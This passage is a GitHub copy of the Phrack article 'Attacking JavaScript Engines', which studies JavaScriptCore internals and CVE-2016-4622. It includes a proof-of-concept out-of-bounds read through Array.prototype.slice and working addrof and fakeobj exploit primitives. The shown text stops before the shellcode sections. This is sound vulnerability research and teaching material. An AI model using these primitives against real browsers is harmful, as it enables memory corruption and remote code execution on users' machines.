-
Notifications
You must be signed in to change notification settings - Fork 0
/
3.txt
1626 lines (1304 loc) · 69.9 KB
/
3.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
==Phrack Inc.==
Volume 0x10, Issue 0x46, Phile #0x03 of 0x0f
|=-----------------------------------------------------------------------=|
|=---------------=[ The Art of Exploitation ]=---------------=|
|=-----------------------------------------------------------------------=|
|=------------------=[ Attacking JavaScript Engines ]=-------------------=|
|=--------=[ A case study of JavaScriptCore and CVE-2016-4622 ]=---------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ saelo ]=--------------------------------=|
|=-----------------------=[ [email protected] ]=--------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of contents
0 - Introduction
1 - JavaScriptCore overview
1.1 - Values, the VM, and (NaN-)boxing
1.2 - Objects and arrays
1.3 - Functions
2 - The bug
2.1 - The vulnerable code
2.2 - About JavaScript type conversions
2.3 - Exploiting with valueOf
2.4 - Reflecting on the bug
3 - The JavaScriptCore heaps
3.1 - Garbage collector basics
3.2 - Marked space
3.3 - Copied space
4 - Constructing exploit primitives
4.1 - Prerequisites: Int64
4.2 - addrof and fakeobj
4.3 - Plan of exploitation
5 - Understanding the JSObject system
5.1 - Property storage
5.2 - JSObject internals
5.3 - About structures
6 - Exploitation
6.1 - Predicting structure IDs
6.2 - Putting things together: faking a Float64Array
6.3 - Executing shellcode
6.4 - Surviving garbage collection
6.5 - Summary
7 - Abusing the renderer process
7.1 - WebKit process and privilege model
7.2 - The same-origin policy
7.3 - Stealing emails
8 - References
9 - Source code
--[ 0 - Introduction
This article strives to give an introduction to the topic of JavaScript
engine exploitation at the example of a specific vulnerability. The
particular target will be JavaScriptCore, the engine inside WebKit.
The vulnerability in question is CVE-2016-4622 and was discovered by yours
truly in early 2016, then reported as ZDI-16-485 [1]. It allows an attacker
to leak addresses as well as inject fake JavaScript objects into the
engine. Combining these primitives will result in remote code execution
inside the renderer process. The bug was fixed in 650552a. Code snippets in
this article were taken from commit 320b1fc, which was the last vulnerable
revision. The vulnerability was introduced approximately one year earlier
with commit 2fa4973. All exploit code was tested on Safari 9.1.1.
The exploitation of said vulnerability requires knowledge of various engine
internals, which are, however, also quite interesting by themselves. As
such various pieces that are part of a modern JavaScript engine will be
discussed along the way. We will focus on the implementation of
JavaScriptCore, but the concepts will generally be applicable to other
engines as well.
Prior knowledge of the JavaScript language will, for the most part, not be
required.
--[ 1 - JavaScript engine overview
On a high level, a JavaScript engine contains
* a compiler infrastructure, typically including at least one
just-in-time (JIT) compiler
* a virtual machine that operates on JavaScript values
* a runtime that provides a set of builtin objects and functions
We will not be concerned about the inner workings of the compiler
infrastructure too much as they are mostly irrelevant to this specific bug.
For our purposes it suffices to treat the compiler as a black box which
emits bytecode (and potentially native code in the case of a JIT compiler)
from the given source code.
----[ 1.1 - The VM, Values, and NaN-boxing
The virtual machine (VM) typically contains an interpreter which can
directly execute the emitted bytecode. The VM is often implemented as
stack-based machines (in contrast to register-based machines) and thus
operate around a stack of values. The implementation of a specific opcode
handler might then look something like this:
CASE(JSOP_ADD)
{
MutableHandleValue lval = REGS.stackHandleAt(-2);
MutableHandleValue rval = REGS.stackHandleAt(-1);
MutableHandleValue res = REGS.stackHandleAt(-2);
if (!AddOperation(cx, lval, rval, res))
goto error;
REGS.sp--;
}
END_CASE(JSOP_ADD)
Note that this example is actually taken from Firefox' Spidermonkey engine
as JavaScriptCore (from here on abbreviated as JSC) uses an interpreter
that is written in a form of assembly language and thus not quite as
straightforward as the above example. The interested reader can however
find the implementation of JSC's low-level interpreter (llint) in
LowLevelInterpreter64.asm.
Often the first stage JIT compiler (sometimes called baseline JIT) takes
care of removing some of the dispatching overhead of the interpreter while
higher stage JIT compilers perform sophisticated optimizations, similar to
the ahead-of-time compilers we are used to. Optimizing JIT compilers are
typically speculative, meaning they will perform optimizations based on
some speculation, e.g. 'this variable will always contain a number'.
Should the speculation ever turn out to be incorrect, the code will usually
bail out to one of the lower tiers. For more information about the
different execution modes the reader is referred to [2] and [3].
JavaScript is a dynamically typed language. As such, type information is
associated with the (runtime) values rather than (compile-time) variables.
The JavaScript type system [4] defines primitive types (number, string,
boolean, null, undefined, symbol) and objects (including arrays and
functions). In particular, there is no concept of classes in the JavaScript
language as is present in other languages. Instead, JavaScript uses what is
called "prototype-based-inheritance", where each objects has a (possibly
null) reference to a prototype object whose properties it incorporates.
The interested reader is referred to the JavaScript specification [5] for
more information.
All major JavaScript engines represent a value with no more than 8 bytes
for performance reasons (fast copying, fits into a register on 64-bit
architectures). Some engines like Google's v8 use tagged pointers to
represent values. Here the least significant bits indicate whether the
value is a pointer or some form of immediate value. JavaScriptCore (JSC)
and Spidermonkey in Firefox on the other hand use a concept called
NaN-boxing. NaN-boxing makes use of the fact that there exist multiple bit
patterns which all represent NaN, so other values can be encoded in these.
Specifically, every IEEE 754 floating point value with all exponent bits
set, but a fraction not equal to zero represents NaN. For double precision
values [6] this leaves us with 2^51 different bit patterns (ignoring the
sign bit and setting the first fraction bit to one so nullptr can still be
represented). That's enough to encode both 32-bit integers and pointers,
since even on 64-bit platforms only 48 bits are currently used for
addressing.
The scheme used by JSC is nicely explained in JSCJSValue.h, which the
reader is encouraged to read. The relevant part is quoted below as it will
be important later on:
* The top 16-bits denote the type of the encoded JSValue:
*
* Pointer { 0000:PPPP:PPPP:PPPP
* / 0001:****:****:****
* Double { ...
* \ FFFE:****:****:****
* Integer { FFFF:0000:IIII:IIII
*
* The scheme we have implemented encodes double precision values by
* performing a 64-bit integer addition of the value 2^48 to the number.
* After this manipulation no encoded double-precision value will begin
* with the pattern 0x0000 or 0xFFFF. Values must be decoded by
* reversing this operation before subsequent floating point operations
* may be performed.
*
* 32-bit signed integers are marked with the 16-bit tag 0xFFFF.
*
* The tag 0x0000 denotes a pointer, or another form of tagged
* immediate. Boolean, null and undefined values are represented by
* specific, invalid pointer values:
*
* False: 0x06
* True: 0x07
* Undefined: 0x0a
* Null: 0x02
*
Interestingly, 0x0 is not a valid JSValue and will lead to a crash inside
the engine.
----[ 1.2 - Objects and Arrays
Objects in JavaScript are essentially collections of properties which are
stored as (key, value) pairs. Properties can be accessed either with the
dot operator (foo.bar) or through square brackets (foo['bar']). At least in
theory, values used as keys are converted to strings before performing the
lookup.
Arrays are described by the specification as special ("exotic") objects
whose properties are also called elements if the property name can be
represented by a 32-bit integer [7]. Most engines today extend this notion
to all objects. An array then becomes an object with a special 'length'
property whose value is always equal to the index of the highest element
plus one. The net result of all this is that every object has both
properties, accessed through a string or symbol key, and elements, accessed
through integer indices.
Internally, JSC stores both properties and elements in the same memory
region and stores a pointer to that region in the object itself. This
pointer points to the middle of the region, properties are stored to the
left of it (lower addresses) and elements to the right of it. There is also
a small header located just before the pointed to address that contains
the length of the element vector. This concept is called a "Butterfly"
since the values expand to the left and right, similar to the wings of a
butterfly. Presumably. In the following, we will refer to both the pointer
and the memory region as "Butterfly". In case it is not obvious from the
context, the specific meaning will be noted.
--------------------------------------------------------
.. | propY | propX | length | elem0 | elem1 | elem2 | ..
--------------------------------------------------------
^
|
+---------------+
|
+-------------+
| Some Object |
+-------------+
Although typical, elements do not have to be stored linearly in memory.
In particular, code such as
a = [];
a[0] = 42;
a[10000] = 42;
will likely lead to an array stored in some kind of sparse mode, which
performs an additional mapping step from the given index to an index into
the backing storage. That way this array does not require 10001 value
slots. Besides the different array storage models, arrays can also store
their data using different representations. For example, an array of 32-bit
integers could be stored in native form to avoid the (NaN-)unboxing and
reboxing process during most operations and save some memory. As such, JSC
defines a set of different indexing types which can be found in
IndexingType.h. The most important ones are:
ArrayWithInt32 = IsArray | Int32Shape;
ArrayWithDouble = IsArray | DoubleShape;
ArrayWithContiguous = IsArray | ContiguousShape;
Here, the last type stores JSValues while the former two store their native
types.
At this point the reader probably wonders how a property lookup is
performed in this model. We will dive into this extensively later on, but
the short version is that a special meta-object, called a "structure" in
JSC, is associated with every object which provides a mapping from property
names to slot numbers.
----[ 1.3 - Functions
Functions are quite important in the JavaScript language. As such they
deserve some discussion on their own.
When executing a function's body, two special variables become available.
One of them, 'arguments' provides access to the arguments (and caller) of
the function, thus enabling the creation of function with a variable number
of arguments. The other, 'this', refers to different objects depending on
the invocation of the function:
* If the function was called as a constructor (using 'new func()'),
then 'this' points to the newly created object. Its prototype has
already been set to the .prototype property of the function object,
which is set to a new object during function definition.
* If the function was called as a method of some object (using
'obj.func()'), then 'this' will point to the reference object.
* Else 'this' simply points to the current global object, as it does
outside of a function as well.
Since functions are first class objects in JavaScript they too can have
properties. We've already seen the .prototype property above. Two other
quite interesting properties of each function (actually of the function
prototype) are the .call and .apply functions, which allow calling the
function with a given 'this' object and arguments. This can for example be
used to implement decorator functionality:
function decorate(func) {
return function() {
for (var i = 0; i < arguments.length; i++) {
// do something with arguments[i]
}
return func.apply(this, arguments);
};
}
This also has some implications on the implementation of JavaScript
functions inside the engine as they cannot make any assumptions about the
value of the reference object which they are called with, as it can be set
to arbitrary values from script. Thus, all internal JavaScript functions
will need to check the type of not only their arguments but also of the
this object.
Internally, the built-in functions and methods [8] are usually implemented
in one of two ways: as native functions in C++ or in JavaScript itself.
Let's look at a simple example of a native function in JSC: the
implementation of Math.pow():
EncodedJSValue JSC_HOST_CALL mathProtoFuncPow(ExecState* exec)
{
// ECMA 15.8.2.1.13
double arg = exec->argument(0).toNumber(exec);
double arg2 = exec->argument(1).toNumber(exec);
return JSValue::encode(JSValue(operationMathPow(arg, arg2)));
}
We can see:
1. The signature for native JavaScript functions
2. How arguments are extracted using the argument method (which returns
the undefined value if not enough arguments were provided)
3. How arguments are converted to their required type. There is a set
of conversion rules governing the conversion of e.g. arrays to
numbers which toNumber will make use of. More on these later.
4. How the actual operation is performed on the native data type
5. How the result is returned to the caller. In this case simply by
encoding the resulting native number into a value.
There is another pattern visible here: the core implementation of various
operations (in this case operationMathPow) are moved into separate
functions so they can be called directly from JIT compiled code.
--[ 2 - The bug
The bug in question lies in the implementation of Array.prototype.slice
[9]. The native function arrayProtoFuncSlice, located in
ArrayPrototype.cpp, is invoked whenever the slice method is called in
JavaScript:
var a = [1, 2, 3, 4];
var s = a.slice(1, 3);
// s now contains [2, 3]
The implementation is given below with minor reformatting, some omissions
for readability, and markers for the explanation below. The full
implementation can be found online as well [10].
EncodedJSValue JSC_HOST_CALL arrayProtoFuncSlice(ExecState* exec)
{
/* [[ 1 ]] */
JSObject* thisObj = exec->thisValue()
.toThis(exec, StrictMode)
.toObject(exec);
if (!thisObj)
return JSValue::encode(JSValue());
/* [[ 2 ]] */
unsigned length = getLength(exec, thisObj);
if (exec->hadException())
return JSValue::encode(jsUndefined());
/* [[ 3 ]] */
unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 0, length);
unsigned end =
argumentClampedIndexFromStartOrEnd(exec, 1, length, length);
/* [[ 4 ]] */
std::pair<SpeciesConstructResult, JSObject*> speciesResult =
speciesConstructArray(exec, thisObj, end - begin);
// We can only get an exception if we call some user function.
if (UNLIKELY(speciesResult.first ==
SpeciesConstructResult::Exception))
return JSValue::encode(jsUndefined());
/* [[ 5 ]] */
if (LIKELY(speciesResult.first == SpeciesConstructResult::FastPath &&
isJSArray(thisObj))) {
if (JSArray* result =
asArray(thisObj)->fastSlice(*exec, begin, end - begin))
return JSValue::encode(result);
}
JSObject* result;
if (speciesResult.first == SpeciesConstructResult::CreatedObject)
result = speciesResult.second;
else
result = constructEmptyArray(exec, nullptr, end - begin);
unsigned n = 0;
for (unsigned k = begin; k < end; k++, n++) {
JSValue v = getProperty(exec, thisObj, k);
if (exec->hadException())
return JSValue::encode(jsUndefined());
if (v)
result->putDirectIndex(exec, n, v);
}
setLength(exec, result, n);
return JSValue::encode(result);
}
The code essentially does the following:
1. Obtain the reference object for the method call (this will be the
array object)
2. Retrieve the length of the array
3. Convert the arguments (start and end index) into native integer
types and clamp them to the range [0, length)
4. Check if a species constructor [11] should be used
5. Perform the slicing
The last step is done in one of two ways: if the array is a native array
with dense storage, 'fastSlice' will be used which just memcpy's the values
into the new array using the given index and length. If the fast path is
not possible, a simple loop is used to fetch each element and add it to the
new array. Note that, in contrast to the property accessors used on the
slow path, fastSlice does not perform any additional bounds checking... ;)
Looking at the code, it is easy to assume that the variables 'begin' and
`end` would be smaller than the size of the array after they had been
converted to native integers. However, we can violate that assumption by
(ab)using the JavaScript type conversion rules.
----[ 2.2 - About JavaScript conversion rules
JavaScript is inherently weakly typed, meaning it will happily convert
values of different types into the type that it currently requires.
Consider Math.abs(), which returns the absolute value of the argument. All
of the following are "valid" invocations, meaning they won't raise an
exception:
Math.abs(-42); // argument is a number
// 42
Math.abs("-42"); // argument is a string
// 42
Math.abs([]); // argument is an empty array
// 0
Math.abs(true); // argument is a boolean
// 1
Math.abs({}); // argument is an object
// NaN
In contrast, strongly-typed languages such as python will usually raise an
exception (or, in case of statically-typed languages, issue a compiler
error) if e.g. a string is passed to abs().
The conversion rules for numeric types are described in [12]. The rules
governing the conversion from object types to numbers (and primitive types
in general) are especially interesting. In particular, if the object has a
callable property named "valueOf", this method will be called and the
return value used if it is a primitive value. And thus:
Math.abs({valueOf: function() { return -42; }});
// 42
----[ 2.3 - Exploiting with "valueOf"
In the case of `arrayProtoFuncSlice` the conversion to a primitive type is
performed in argumentClampedIndexFromStartOrEnd. This method also clamps
the arguments to the range [0, length):
JSValue value = exec->argument(argument);
if (value.isUndefined())
return undefinedValue;
double indexDouble = value.toInteger(exec); // Conversion happens here
if (indexDouble < 0) {
indexDouble += length;
return indexDouble < 0 ? 0 : static_cast<unsigned>(indexDouble);
}
return indexDouble > length ? length :
static_cast<unsigned>(indexDouble);
Now, if we modify the length of the array inside a valueOf function of one
of the arguments, then the implementation of slice will continue to use the
previous length, resulting in an out-of-bounds access during the memcpy.
Before doing this however, we have to make sure that the element storage is
actually resized if we shrink the array. For that let's have a quick look
at the implementation of the .length setter. From JSArray::setLength:
unsigned lengthToClear = butterfly->publicLength() - newLength;
unsigned costToAllocateNewButterfly = 64; // a heuristic.
if (lengthToClear > newLength &&
lengthToClear > costToAllocateNewButterfly) {
reallocateAndShrinkButterfly(exec->vm(), newLength);
return true;
}
This code implements a simple heuristic to avoid relocating the array too
often. To force a relocation of our array we will thus need the new size to
be much less then the old size. Resizing from e.g. 100 elements to 0 will
do the trick.
With that, here's how we can exploit Array.prototype.slice:
var a = [];
for (var i = 0; i < 100; i++)
a.push(i + 0.123);
var b = a.slice(0, {valueOf: function() { a.length = 0; return 10; }});
// b = [0.123,1.123,2.12199579146e-313,0,0,0,0,0,0,0]
The correct output would have been an array of size 10 filled with
'undefined' values since the array has been cleared prior to the slice
operation. However, we can see some float values in the array. Seems like
we've read some stuff past the end of the array elements :)
----[ 2.4 - Reflecting on the bug
This particular programming mistake is not new and has been exploited for a
while now [13, 14, 15]. The core problem here is (mutable) state that is
"cached" in a stack frame (in this case the length of the array object) in
combination with various callback mechanisms that can execute user supplied
code further down in the call stack (in this case the "valueOf" method).
With this setting it is quite easy to make false assumptions about the
state of the engine throughout a function. The same kind of problem
appears in the DOM as well due to the various event callbacks.
--[ 3 - The JavaScriptCore heaps
At this point we've read data past our array but don't quite know what we
are accessing there. To understand this, some background knowledge about
the JSC heap allocators is required.
----[ 3.1 - Garbage collector basics
JavaScript is a garbage collected language, meaning the programmer does not
need to care about memory management. Instead, the garbage collector will
collect unreachable objects from time to time.
One approach to garbage collection is reference counting, which is used
extensively in many applications. However, as of today, all major
JavaScript engines instead use a mark and sweep algorithm. Here the
collector regularly scans all alive objects, starting from a set of root
nodes, and afterwards frees all dead objects. The root nodes are usually
pointers located on the stack as well as global objects like the 'window'
object in a web browser context.
There are various distinctions between garbage collection systems. We will
now discuss some key properties of garbage collection systems which should
help the reader understand some of the related code. Readers familiar with
the subject are free to skip to the end of this section.
First off, JSC uses a conservative garbage collector [16]. In essence, this
means that the GC does not keep track of the root nodes itself. Instead,
during GC it will scan the stack for any value that could be a pointer into
the heap and treats those as root nodes. In contrast, e.g. Spidermonkey
uses a precise garbage collector and thus needs to wrap all references to
heap objects on the stack inside a pointer class (Rooted<>) that takes care
of registering the object with the garbage collector.
Next, JSC uses an incremental garbage collector. This kind of garbage
collector performs the marking in several steps and allows the application
to run in between, reducing GC latency. However, this requires some
additional effort to work correctly. Consider the following case:
* the GC runs and visits some object O and all its referenced objects.
It marks them as visited and later pauses so the application can run
again.
* O is modified and a new reference to another Object P is added to it.
* Then the GC runs again but it doesn't know about P. It finishes the
marking phase and frees the memory of P.
To avoid this scenario, so called write barriers are inserted into the
engine. These take care of notifying the garbage collector in such a
scenario. These barriers are implemented in JSC with the WriteBarrier<>
and CopyBarrier<> classes.
Last, JSC uses both, a moving and a non-moving garbage collector. A moving
garbage collector moves live objects to a different location and updates
all pointers to these objects. This optimizes for the case of many dead
objects since there is no runtime overhead for these: instead of adding
them to a free list, the whole memory region is simply declared free. JSC
stores the JavaScript objects itself, together with a few other objects,
inside a non-moving heap, the marked space, while storing the butterflies
and other arrays inside a moving heap, the copied space.
----[ 3.2 - Marked space
The marked space is a collection of memory blocks that keep track of the
allocated cells. In JSC, every object allocated in marked space must
inherit from the JSCell class and thus starts with an eight byte header,
which, among other fields, contains the current cell state as used by the
GC. This field is used by the collector to keep track of the cells that it
has already visited.
There is another thing worth mentioning about the marked space: JSC stores
a MarkedBlock instance at the beginning of each marked block:
inline MarkedBlock* MarkedBlock::blockFor(const void* p)
{
return reinterpret_cast<MarkedBlock*>(
reinterpret_cast<Bits>(p) & blockMask);
}
This instance contains among other things a pointers to the owning Heap
and VM instance which allows the engine to obtain these if they are not
available in the current context. This makes it more difficult to set up
fake objects, as a valid MarkedBlock instance might be required when
performing certain operations. It is thus desirable to create fake objects
inside a valid marked block if possible.
----[ 3.3 - Copied space
The copied space stores memory buffers that are associated with some object
inside the marked space. These are mostly butterflies, but the contents of
typed arrays may also be located here. As such, our out-of-bounds access
happens in this memory region.
The copied space allocator is very simple:
CheckedBoolean CopiedAllocator::tryAllocate(size_t bytes, void** out)
{
ASSERT(is8ByteAligned(reinterpret_cast<void*>(bytes)));
size_t currentRemaining = m_currentRemaining;
if (bytes > currentRemaining)
return false;
currentRemaining -= bytes;
m_currentRemaining = currentRemaining;
*out = m_currentPayloadEnd - currentRemaining - bytes;
ASSERT(is8ByteAligned(*out));
return true;
}
This is essentially a bump allocator: it will simply return the next N
bytes of memory in the current block until the block is completely used.
Thus, it is almost guaranteed that two following allocations will be placed
adjacent to each other in memory (the edge case being that the first fills
up the current block).
This is good news for us. If we allocate two arrays with one element each,
then the two butterflies will be next to each other in virtually every
case.
--[ 4 - Building exploit primitives
While the bug in question looks like an out-of-bound read at first, it is
actually a more powerful primitive as it lets us "inject" JSValues of our
choosing into the newly created JavaScript arrays, and thus into the
engine.
We will now construct two exploit primitives from the given bug, allowing
us to
1. leak the address of an arbitrary JavaScript object and
2. inject a fake JavaScript Object into the engine.
We will call these primitives 'addrof' and 'fakeobj'.
----[ 4.1 Prerequisites: Int64
As we've previously seen, our exploit primitive currently returns floating
point values instead of integers. In fact, at least in theory, all numbers
in JavaScript are 64-bit floating point numbers [17]. In reality, as
already mentioned, most engines have a dedicated 32-bit integer type for
performance reasons, but convert to floating point values when necessary
(i.e. on overflow). It is thus not possible to represent arbitrary 64-bit
integers (and in particular addresses) with primitive numbers in
JavaScript.
As such, a helper module had to be built which allowed storing 64-bit
integer instances. It supports
* Initialization of Int64 instances from different argument types:
strings, numbers and byte arrays.
* Assigning the result of addition and subtraction to an existing
instance through the assignXXX methods. Using these methods avoids
further heap allocations which might be desirable at times.
* Creating new instances that store the result of an addition or
subtraction through the Add and Sub functions.
* Converting between doubles, JSValues and Int64 instances such that
the underlying bit pattern stays the same.
The last point deserves further discussing. As we've seen above, we obtain
a double whose underlying memory interpreted as native integer is our
desired address. We thus need to convert between native doubles and our
integers such that the underlying bits stay the same. asDouble() can be
thought of as running the following C code:
double asDouble(uint64_t num)
{
return *(double*)#
}
The asJSValue method further respects the NaN-boxing procedure and produces
a JSValue with the given bit pattern. The interested reader is referred to
the int64.js file inside the attached source code archive for more
details.
With this out of the way let us get back to building our two exploit
primitives.
----[ 4.2 addrof and fakeobj
Both primitives rely on the fact that JSC stores arrays of doubles in
native representation as opposed to the NaN-boxed representation. This
essentially allows us to write native doubles (indexing type
ArrayWithDoubles) but have the engine treat them as JSValues (indexing type
ArrayWithContiguous) and vice versa.
So, here are the steps required for exploiting the address leak:
1. Create an array of doubles. This will be stored internally as
IndexingType ArrayWithDouble
2. Set up an object with a custom valueOf function which will
2.1 shrink the previously created array
2.2 allocate a new array containing just the object whose address
we wish to know. This array will (most likely) be placed right
behind the new butterfly since it's located in copied space
2.3 return a value larger than the new size of the array to trigger
the bug
3. Call slice() on the target array the object from step 2 as one of
the arguments
We will now find the desired address in the form of a 64-bit floating point
value inside the array. This works because slice() preserves the indexing
type. Our new array will thus treat the data as native doubles as well,
allowing us to leak arbitrary JSValue instances, and thus pointers.
The fakeobj primitive works essentially the other way around. Here we
inject native doubles into an array of JSValues, allowing us to create
JSObject pointers:
1. Create an array of objects. This will be stored internally as
IndexingType ArrayWithContiguous
2. Set up an object with a custom valueOf function which will
2.1 shrink the previously created array
2.2 allocate a new array containing just a double whose bit pattern
matches the address of the JSObject we wish to inject. The
double will be stored in native form since the array's
IndexingType will be ArrayWithDouble
2.3 return a value larger than the new size of the array to trigger
the bug
3. Call slice() on the target array the object from step 2 as one of
the arguments
For completeness, the implementation of both primitives is printed below.
function addrof(object) {
var a = [];
for (var i = 0; i < 100; i++)
a.push(i + 0.1337); // Array must be of type ArrayWithDoubles
var hax = {valueOf: function() {
a.length = 0;
a = [object];
return 4;
}};
var b = a.slice(0, hax);
return Int64.fromDouble(b[3]);
}
function fakeobj(addr) {
var a = [];
for (var i = 0; i < 100; i++)
a.push({}); // Array must be of type ArrayWithContiguous
addr = addr.asDouble();
var hax = {valueOf: function() {
a.length = 0;
a = [addr];
return 4;
}};
return a.slice(0, hax)[3];
}
----[ 4.3 - Plan of exploitation
From here on our goal will be to obtain an arbitrary memory read/write
primitive through a fake JavaScript object. We are faced with the following
questions:
Q1. What kind of object do we want to fake?
Q2. How do we fake such an object?
Q3. Where do we place the faked object so that we know its address?
For a while now, JavaScript engines have supported typed arrays [18], an
efficient and highly optimizable storage for raw binary data. These turn
out to be good candidates for our fake object as they are mutable (in
contrast to JavaScript strings) and thus controlling their data pointer
yields an arbitrary read/write primitive usable from script. Ultimately our
goal will now be to fake a Float64Array instance.
We will now turn to Q2 and Q3, which require another discussion of JSC
internals, namely the JSObject system.
--[ 5 - Understanding the JSObject system
JavaScript objects are implemented in JSC by a combination of C++ classes.
At the center lies the JSObject class which is itself a JSCell (and as such
tracked by the garbage collector). There are various subclasses of JSObject
that loosely resemble different JavaScript objects, such as Arrays
(JSArray), Typed arrays (JSArrayBufferView), or Proxys (JSProxy).
We will now explore the different parts that make up JSObjects inside the
JSC engine.
----[ 5.1 - Property storage
Properties are the most important aspect of JavaScript objects. We have
already seen how properties are stored in the engine: the butterfly. But
that is only half the truth. Besides the butterfly, JSObjects can also have
inline storage (6 slots by default, but subject to runtime analysis),
located right after the object in memory. This can result in a slight
performance gain if no butterfly ever needs to be allocated for an object.
The inline storage is interesting for us since we can leak the address of
an object, and thus know the address of its inline slots. These make up a
good candidate to place our fake object in. As added bonus, going this way
we also avoid any problem that might arise when placing an object outside
of a marked block as previously discussed. This answers Q3.
Let's turn to Q2 now.
----[ 5.2 - JSObject internals
We will start with an example: suppose we run the following piece of JS
code:
obj = {'a': 0x1337, 'b': false, 'c': 13.37, 'd': [1,2,3,4]};
This will result in the following object:
(lldb) x/6gx 0x10cd97c10
0x10cd97c10: 0x0100150000000136 0x0000000000000000
0x10cd97c20: 0xffff000000001337 0x0000000000000006
0x10cd97c30: 0x402bbd70a3d70a3d 0x000000010cdc7e10
The first quadword is the JSCell. The second one the Butterfly pointer,
which is null since all properties are stored inline. Next are the inline
JSValue slots for the four properties: an integer, false, a double, and a
JSObject pointer. If we were to add more properties to the object, a
butterfly would at some point be allocated to store these.
So what does a JSCell contain? JSCell.h reveals:
StructureID m_structureID;
This is the most interesting one, we'll explore it further below.
IndexingType m_indexingType;
We've already seen this before. It indicates the storage mode of
the object's elements.
JSType m_type;
Stores the type of this cell: string, symbol,function,
plain object, ...
TypeInfo::InlineTypeFlags m_flags;
Flags that aren't too important for our purposes. JSTypeInfo.h
contains further information.
CellState m_cellState;
We've also seen this before. It is used by the garbage collector
during collection.
----[ 5.3 - About structures
JSC creates meta-objects which describe the structure, or layout, of a
JavaScript object. These objects represent mappings from property names to
indices into the inline storage or the butterfly (both are treated as
JSValue arrays). In its most basic form, such a structure could be an array
of <property name, slot index> pairs. It could also be implemented as a
linked list or a hash map. Instead of storing a pointer to this structure
in every JSCell instance, the developers instead decided to store a 32-bit
index into a structure table to save some space for the other fields.
So what happens when a new property is added to an object? If this happens
for the first time then a new Structure instance will be allocated,
containing the previous slot indices for all exiting properties and an
additional one for the new property. The property would then be stored at
the corresponding index, possibly requiring a reallocation of the
butterfly. To avoid repeating this process, the resulting Structure
instance can be cached in the previous structure, in a data structure
called "transiton table". The original structure might also be adjusted to
allocate more inline or butterfly storage up front to avoid the
reallocation. This mechanism ultimately makes structures reusable.
Time for an example. Suppose we have the following JavaScript code:
var o = { foo: 42 };
if (someCondition)
o.bar = 43;
else
o.baz = 44;
This would result in the creation of the following three Structure
instances, here shown with the (arbitrary) property name to slot index
mappings:
+-----------------+ +-----------------+
| Structure 1 | +bar | Structure 2 |
| +--------->| |
| foo: 0 | | foo: 0 |
+--------+--------+ | bar: 1 |
| +-----------------+
| +baz +-----------------+
+-------->| Structure 3 |
| |
| foo: 0 |
| baz: 1 |
+-----------------+
